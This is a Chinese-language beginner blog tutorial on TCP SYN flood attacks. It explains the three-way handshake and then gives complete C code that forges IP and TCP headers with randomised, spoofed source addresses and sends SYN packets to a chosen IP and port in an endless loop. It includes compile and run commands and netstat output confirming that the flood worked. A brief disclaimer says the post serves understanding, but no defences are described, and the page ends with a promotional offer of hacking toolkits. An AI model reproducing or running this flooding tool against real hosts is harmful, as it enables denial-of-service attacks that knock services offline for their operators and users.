[黑客入门] TCP SYN洪水 (SYN Flood) 攻击原理与实现（非常详细）零基础入门到精通，收藏这一篇就够了

最新推荐文章于 2025-04-08 17:28:27 发布

网络安全大白

最新推荐文章于 2025-04-08 17:28:27 发布

阅读量2.8k

点赞数 13

分类专栏：网络安全科技程序员文章标签： tcp/ip 网络服务器

本文链接：https://blog.youkuaiyun.com/Python_paipai/article/details/139675125

版权

程序员同时被 3 个专栏收录

700 篇文章

订阅专栏

网络安全

596 篇文章

订阅专栏

科技

516 篇文章

订阅专栏

注意：本文只探讨技术，请勿用于非法用途，否则后果自负。

TCP协议是 TCP/IP 协议栈中一个重要的协议，平时我们使用的浏览器，APP等大多使用 TCP 协议通讯的，可见 TCP 协议在网络中扮演的角色是多么的重要。

TCP 协议是一个可靠的、面向连接的流协议，由于 TCP 协议是建立在 IP 协议这种面向无连接的协议，所以 TCP 协议必须自己来维护连接的状态。

三次握手过程

TCP 协议通过一种名为 三次握手 的过程来建立客户端与服务端的连接，三次握手 过程的原理如图1：

(图一三次握手过程)

建立连接三次握手过程如下：

客户端需要发送一个 SYN包 给服务端（包含了客户端初始化序列号），并且将连接的状态设置为 SYN_SENT，这个过程由 connect() 系统调用完成。
服务端接收到客户端发送过来的 SYN包 后，回复一个 SYN+ACK包 给客户端（包含了服务端初始化序列号），并且设置连接的状态为 SYN_RCVD。
客户端接收到服务端发送过来的 SYN+ACK包 后，设置连接状态为 ESTABLISHED（表示连接已经建立），并且回复一个 ACK包 给服务端。
服务端接收到客户端发送过来的 ACK包 后，将连接状态设置为 ESTABLISHED（表示连接已经建立）。

当 三次握手 过程完成后，一个 TCP 连接就此建立完成。

SYN Flood攻击原理

上面介绍了建立一个 TCP 连接的 三次握手 过程，我们可以发现，三次握手 属于一个协商的过程，也就是说客户端与服务端必须严格按照这个过程来进行，否则连接就不能建立。

这时，如果客户端发送 SYN包 企图与服务端建立连接，但发送完 SYN包 后就不管，那会发送什么事情呢？如图2所示：

(图2 SYN-Flood)

客户端发送一个 SYN包 给服务端后就退出，而服务端接收到 SYN包 后，会回复一个 SYN+ACK包 给客户端，然后等待客户端回复一个 ACK包。

但此时客户端并不会回复 ACK包，所以服务端只能一直等待直到超时。服务端超时后，会重发 SYN+ACK包 给客户端，默认会重试 5 次，而且每次等待的时间都会增加（可以参考 TCP 协议超时重传的实现）。

另外，当服务端接收到 SYN包 后，会建立一个半连接状态的 Socket。所以，当客户端一直发送 SYN包，但不回复 ACK包，那么将会耗尽服务端的资源，这就是 SYN Flood 攻击。

SYN Flood攻击实验

接下来，我们通过自己编写代码来进行 SYN Flood攻击 实验。

因为 SYN Flood攻击 需要构建 TCP 协议头部，所以下面介绍一下 TCP 协议头部的格式，如图3：

(图3 TCP 协议头部格式)

我们定义以下结构来描述 TCP 协议头部：

struct tcphdr {`    `unsigned short      sport;    // 源端口`    `unsigned short      dport;    // 目标端口`    `unsigned int        seq;      // 序列号`    `unsigned int        ack_seq;  // 确认号`    `unsigned char       len;      // 首部长度`    `unsigned char       flag;     // 标志位`    `unsigned short      win;      // 窗口大小`    `unsigned short      checksum; // 校验和`    `unsigned short      urg;      // 紧急指针``};

下面是设置 TCP 头部的过程：

标志位中的 SYN 字段必须设置为 1，表示这是一个 SYN包，由于 SYN位 位于 flag 字段的第二位，所以可以将 flag 字段设置为 0x02。
源端口号和序列号我们可以随机设置一个，目的端口号设置成要攻击的目标端口。
确认号设置为 0，因为我们还不知道服务端的序列号。
窗口大小可以随便设置，但通常不要设置太小（可以设置成1024）。
校验和这个比较复杂，因为 TCP 协议在计算检验和时，要加上一个12字节的伪首部，伪首部格式如下图：
伪首部共有 12 字节，包含 IP 协议头部的一些字段，有如下信息：32位源IP地址、32位目的IP地址、8位保留字节(置0)、8位传输层协议号(TCP是6，UDP是17)、16位TCP报文长度(TCP首部+数据)。
TCP 协议校验和计算三部分：TCP伪首部 + TCP头部 + TCP数据。
紧急指针可以设置为 0。

按照上面的分析，定义 TCP 伪首部的结构如下：

struct pseudohdr {`    `unsigned int        saddr;`    `unsigned int        daddr;`    `char                zeros;`    `char                protocol;`    `unsigned short      length;``};

计算校验和的算法有点复杂，所以这里直接从网上找到一个封装好的函数，如下（有兴趣可以参考 TCP 协议的 RFC 文档）：

unsigned short inline``checksum(unsigned short *buffer, unsigned short size)`     `{  ``    unsigned long cksum = 0;``   `    `while (size > 1) {`        `cksum += *buffer++;`        `size  -= sizeof(unsigned short);`    `}``   `    `if (size) {`        `cksum += *(unsigned char *)buffer;`    `}``   `    `cksum = (cksum >> 16) + (cksum & 0xffff);`    `cksum += (cksum >> 16);`     `   `    `return (unsigned short )(~cksum);``}

另外，为了在攻击的时候能够设置不同的 IP 地址（因为相同的 IP 地址容易被识别而过滤），我们还需要定义 IP 协议头部。IP 协议头部的格式如图4：

(图4 IP 协议头部)

我们定义以下结构来表示 IP 协议头部：

struct iphdr {`    `unsigned char       ver_and_hdrlen;// 版本号与IP头部长度`    `unsigned char       tos;           // 服务类型`    `unsigned short      total_len;     // 总长度`    `unsigned short      id;            // IP包ID`    `unsigned short      flags;         // 标志位(包括分片偏移量)`    `unsigned char       ttl;           // 生命周期`    `unsigned char       protocol;      // 上层协议`    `unsigned short      checksum;      // 校验和`    `unsigned int        srcaddr;       // 源IP地址`    `unsigned int        dstaddr;       // 目标IP地址``};

1. 初始化 IP 头部

下面我们实现初始化 IP 头部的函数 init_ip_header()：

void init_ip_header(struct iphdr *iphdr, unsigned int srcaddr, unsigned int dstaddr)``{`    `int len = sizeof(struct ip) + sizeof(struct tcphdr);``   `    `iphdr->ver_and_hdrlen = (4 << 4 | sizeof(struct iphdr) / sizeof(unsigned int));`    `iphdr->tos = 0;`    `iphdr->total_len = htons(len);`    `iphdr->id = 1;`    `iphdr->flags = 0x40;`    `iphdr->ttl = 255;`    `iphdr->protocol = IPPROTO_TCP;`    `iphdr->checksum = 0;`    `iphdr->srcaddr = srcaddr; // 源IP地址`    `iphdr->dstaddr = dstaddr; // 目标IP地址``}

init_ip_header() 函数比较简单，就是通过传入的源 IP 地址和目标 IP 地址初始化 IP 头部结构。

2. 初始化 TCP 头部

接下来，我们要实现初始化 TCP 头部的函数 init_tcp_header()：

void init_tcp_header(struct tcphdr *tcphdr, unsigned short dport)``{`    `tcp->sport = htons(rand() % 16383 + 49152);   // 随机生成一个端口`    `tcp->dport = htons(dport);                    // 目标端口`    `tcp->seq = htonl(rand() % 90000000 + 2345 );  // 随机生成一个初始化序列号`    `tcp->ack_seq = 0;``    tcp->len = (sizeof(struct tcphdr) / 4 << 4 | 0);`    `tcp->flag = 0x02;`    `tcp->win = htons(1024);``    tcp->checksum = 0;`    `tcp->urg = 0;``}

3. 初始化 TCP 伪首部

现在我们定义一个 TCP 伪首部初始化函数 init_pseudo_header()：

void init_pseudo_header(struct pseudohdr *hdr, unsigned int srcaddr, ``                        unsigned int dstaddr)``{`    `hdr->zero = 0;`    `hdr->protocol = IPPROTO_TCP;`    `hdr->length = htons(sizeof(struct tcphdr));`    `hdr->saddr = srcaddr;`    `hdr->daddr = dstaddr;``}

4. 构建 SYN 包

接下来我们要实现最为重要的一个函数，就是构建 SYN包，其实现如下：

int make_syn_packet(char *packet, int pkt_len, unsigned int daddr, ``                    unsigned short dport)``{`    `char buf[100];`    `int len;`    `struct iphdr ip;             // IP 头部`    `struct tcphdr tcp;           // TCP 头部`    `struct pseudohdr pseudo;     // TCP 伪头部`    `unsigned int saddr = rand(); // 随机生成一个源IP地址``   `    `len = sizeof(ip) + sizeof(tcp);``   `    `// 初始化头部信息`    `init_ip_header(&ip, saddr, daddr);`    `init_tcp_header(&tcp, dport);`    `init_pseudo_header(&pseudo, saddr, daddr);``   `    `//计算IP校验和`    `ip.checksum = checksum((u_short *)&ip, sizeof(ip));``   `    `// 计算TCP校验和`    `bzero(buf, sizeof(buf));`    `memcpy(buf , &pseudo, sizeof(pseudo));           // 复制TCP伪头部`    `memcpy(buf + sizeof(pseudo), &tcp, sizeof(tcp)); // 复制TCP头部`    `tcp.checksum = checksum((u_short *)buf, sizeof(pseudo) + sizeof(tcp));``   `    `bzero(packet, pkt_len);`    `memcpy(packet, &ip, sizeof(ip));`    `memcpy(packet + sizeof(ip), &tcp, sizeof(tcp));`    `    return len;``}

make_syn_packet() 函数主要通过 目标IP地址 和 目标端口 生成一个 SYN包，保存到参数 packet 中，并且返回包的大小。

5. 创建原始套接字

由于要发送自己构建的 IP 头部和 TCP 头部，所以必须使用 原始套接字 来发送。原始套接字 在创建时需要指定 SOCK_RAW 参数，下面我们定义一个创建原始套接字的函数：

int make_raw_socket()``{`    `int fd;`    `int on = 1;``   `    `// 创建一个原始套接字, 指定其关注TCP协议`    `fd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);`    `if (fd == -1) {`        `return -1;`    `}``   `    `// 设置需要手动构建IP头部`    `if (setsockopt(fd, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0) {`        `close(fd);`        `return -1;`    `}``   `    `return fd;``}

在调用 socket() 函数创建套接字时，指定第二个参数为 SOCK_RAW，表示创建的套接字为原始套接字。然后调用 setsockopt() 函数设置 IP 头部由我们自己构建。

6. 发送SYN包

下面我们实现发送 SYN包 的函数：

int send_syn_packet(int sockfd, unsigned int addr, unsigned short port)``{`    `struct sockaddr_in skaddr;`    `char packet[256];`    `int pkt_len;``   `    `bzero(&skaddr, sizeof(skaddr));``   `    `skaddr.sin_family = AF_INET;`    `skaddr.sin_port = htons(port);`    `skaddr.sin_addr.s_addr = addr;``   `    `pkt_len = make_syn_packet(packet, 256, addr, port);``   `    `return sendto(sockfd, packet, pkt_len, 0, (struct sockaddr *)&skaddr,`                  `sizeof(struct sockaddr));``}

send_syn_packet() 函数需要传入原始套接字、目标IP地址和目标端口，然后通过调用 sendto() 函数向服务端发送一个 SYN包。

7. 主函数

最后，我们来实现主函数 main()：

int main(int argc, char *argv[])``{`    `unsigned int addr;`    `unsigned short port;`    `int sockfd;``   `    `if (argc < 3) {`        `fprintf(stderr, "Usage: synflood <address> <port>\n");`        `exit(1);`    `}``   `    `addr = inet_addr(argv[1]);  // 获取目标IP`    `port = atoi(argv[2]);       // 获取目标端口``   `    `if (port < 0 || port > 65535) {`        `fprintf(stderr, "Invalid destination port number: %s\n", argv[2]);`        `exit(1);`    `}``   `    `sockfd = make_raw_socket(); // 创建原始socket`    `if (sockfd == -1) {`        `fprintf(stderr, "Failed to make raw socket\n");`        `exit(1);`    `}``   `    `for (;;) {`        `if (send_syn_packet(sockfd, addr, port) < 0) { // 发送SYN包`            `fprintf(stderr, "Failed to send syn packet\n");`        `}`    `}``   `    `close(sockfd);``   `    `return 0;``}

main() 函数也很简单，首先从命令行读取到 目标 IP 地址 和 目标端口，然后调用 make_raw_socket() 创建一个原始套接字，最后在一个无限循环中不断向服务端发送 SYN包。

完整的源代码在：https://github.com/liexusong/synflood/blob/main/synflood.c

现在我们通过以下命令来编译这个程序：

root@vagrant]$ gcc -o synflood synflood.c

然后使用以下命令运行程序：

root@vagrant]$ sudo synflood 127.0.0.1 80

上面的命令就是攻击本地的80端口，我们可以使用以下命令查看TCP连接的状态：

root@vagrant]$ netstat -np|grep tcp``tcp        0      0 127.0.0.1:80            229.20.1.110:51861      SYN_RECV    -``tcp        0      0 127.0.0.1:80            239.137.18.30:52104     SYN_RECV    -``tcp        0      0 127.0.0.1:80            233.90.28.10:65322      SYN_RECV    -``tcp        0      0 127.0.0.1:80            236.13.8.74:57922       SYN_RECV    -``tcp        0      0 127.0.0.1:80            229.81.76.55:52345      SYN_RECV    -``tcp        0      0 127.0.0.1:80            236.226.188.82:53560    SYN_RECV    -``tcp        0      0 127.0.0.1:80            236.245.238.56:49499    SYN_RECV    -``tcp        0      0 127.0.0.1:80            224.222.45.20:49270     SYN_RECV    -``tcp        0      0 127.0.0.1:80            230.2.130.115:63709     SYN_RECV    -``tcp        0      0 127.0.0.1:80            239.233.180.85:59636    SYN_RECV    -``tcp        0      0 127.0.0.1:80            236.168.175.81:60326    SYN_RECV    -``tcp        0      0 127.0.0.1:80            235.27.77.111:65276     SYN_RECV    -``tcp        0      0 127.0.0.1:80            236.4.252.114:60898     SYN_RECV    -``tcp        0      0 127.0.0.1:80            226.62.209.29:64605     SYN_RECV    -``tcp        0      0 127.0.0.1:80            232.106.157.82:56451    SYN_RECV    -``tcp        0      0 127.0.0.1:80            235.247.175.35:54963    SYN_RECV    -``tcp        0      0 127.0.0.1:80            231.100.248.95:58660    SYN_RECV    -``tcp        0      0 127.0.0.1:80            228.113.70.57:60157     SYN_RECV    -``tcp        0      0 127.0.0.1:80            236.76.245.32:59218     SYN_RECV    -``tcp        0      0 127.0.0.1:80            232.76.169.15:50441     SYN_RECV    -``tcp        0      0 127.0.0.1:80            236.191.51.34:53060     SYN_RECV    -``tcp        0      0 127.0.0.1:80            227.215.119.119:55480   SYN_RECV    -``tcp        0      0 127.0.0.1:80            227.185.145.18:56882    SYN_RECV    -``tcp        0      0 127.0.0.1:80            234.73.216.62:58793     SYN_RECV    -``tcp        0      0 127.0.0.1:80            234.183.17.49:59739     SYN_RECV    -``tcp        0      0 127.0.0.1:80            235.233.86.125:55530    SYN_RECV    -``tcp        0      0 127.0.0.1:80            229.117.216.112:52235   SYN_RECV    -``tcp        0      0 127.0.0.1:80            238.182.168.62:65214    SYN_RECV    -``tcp        0      0 127.0.0.1:80            225.88.213.112:62171    SYN_RECV    -``tcp        0      0 127.0.0.1:80            225.218.65.88:60597     SYN_RECV    -``tcp        0      0 127.0.0.1:80            239.116.219.23:58731    SYN_RECV    -``tcp        0      0 127.0.0.1:80            232.99.36.55:51906      SYN_RECV    -``tcp        0      0 127.0.0.1:80            225.198.211.64:52338    SYN_RECV    -``tcp        0      0 127.0.0.1:80            230.229.104.121:62795   SYN_RECV    -``...

从上面的结果可以看出，服务器已经生成了很多半连接状态的 TCP 连接，表示我们的攻击已经生效。

总结

本文主要介绍了 SYN Flood攻击 的原理与实施方式，本文的本意是通过理解攻击原理来更好的防范被攻击，而不是教你怎么去攻击，所以千万别用于恶意攻击、千万别用于恶意攻击、千万别用于恶意攻击（重要的事情讲三次）。

另外，防止 SYN Flood攻击 的方法很多，这里就不介绍了，有兴趣可以查阅相关的资料。

参考资料：1. https://blog.youkuaiyun.com/zhangskd/article/details/11770647

             2. https://blog.youkuaiyun.com/jiange\_zh/article/details/50446172

`黑客&网络安全如何学习

今天只要你给我的文章点赞，我私藏的网安学习资料一样免费共享给你们，来看看有哪些东西。

1.学习路线图

攻击和防守要学的东西也不少，具体要学的东西我都写在了上面的路线图，如果你能学完它们，你去就业和接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源，但基本上都残缺不全的，这是我自己录的网安视频教程，上面路线图的每一个知识点，我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等，都是网络安全入门必知必会的学习内容。

（都打包成一块的了，不能一一展开，总共300多集）

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

优快云大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享

3.技术文档和电子书

技术文档也是我自己整理的，包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点，电子书也有200多本，由于内容的敏感性，我就不一一展示了。

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

优快云大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在信息收集、Android黑客工具、自动化工具、网络钓鱼等，感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包，需要的话也可以拿走。

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

优快云大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享

最后就是我这几年整理的网安方面的面试题，如果你是要找网安方面的工作，它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的，如果大家有好的题目或者好的见解欢迎分享。

参考解析：深信服官网、奇安信官网、Freebuf、csdn等

内容特点：条理清晰，含图像化表示更加易懂。

内容概要：包括内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

优快云大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享